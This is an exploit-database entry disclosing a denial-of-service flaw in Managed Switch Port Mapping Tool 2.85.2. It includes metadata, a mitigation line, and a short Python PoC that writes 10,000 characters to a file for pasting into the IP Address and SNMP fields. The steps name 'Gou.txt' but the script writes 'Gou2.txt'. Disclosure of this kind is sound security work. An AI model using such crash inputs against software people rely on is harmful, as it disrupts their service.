Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)

vendor:

Managed Switch Port Mapping Tool

by:

Ismael Nava

6.5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Managed Switch Port Mapping Tool

Affected Version From: 2.85.2

Affected Version To: 2.85.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home x64

2021

Managed Switch Port Mapping Tool 2.85.2 – Denial of Service (PoC)

Managed Switch Port Mapping Tool 2.85.2 is vulnerable to a denial of service attack. An attacker can create a file with a large amount of data and paste it into the IP Address and SNMP v1/v2c Read Community Name fields to cause a denial of service.

Mitigation:

Ensure that input validation is performed on user-supplied data to prevent buffer overflow attacks.

Source

Exploit-DB raw data:

# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://switchportmapper.com/
# Software Link: https://switchportmapper.com/download.htm
# Version: 2.85.2
# Tested on: Windows 10 Home x64


#STEPS
# Open the program Managed Switch Port Mapping Tool
# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches)
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name 
# Click in OK
# End :)


buffer = 'F' * 10000

try: 
    file = open("Gou2.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")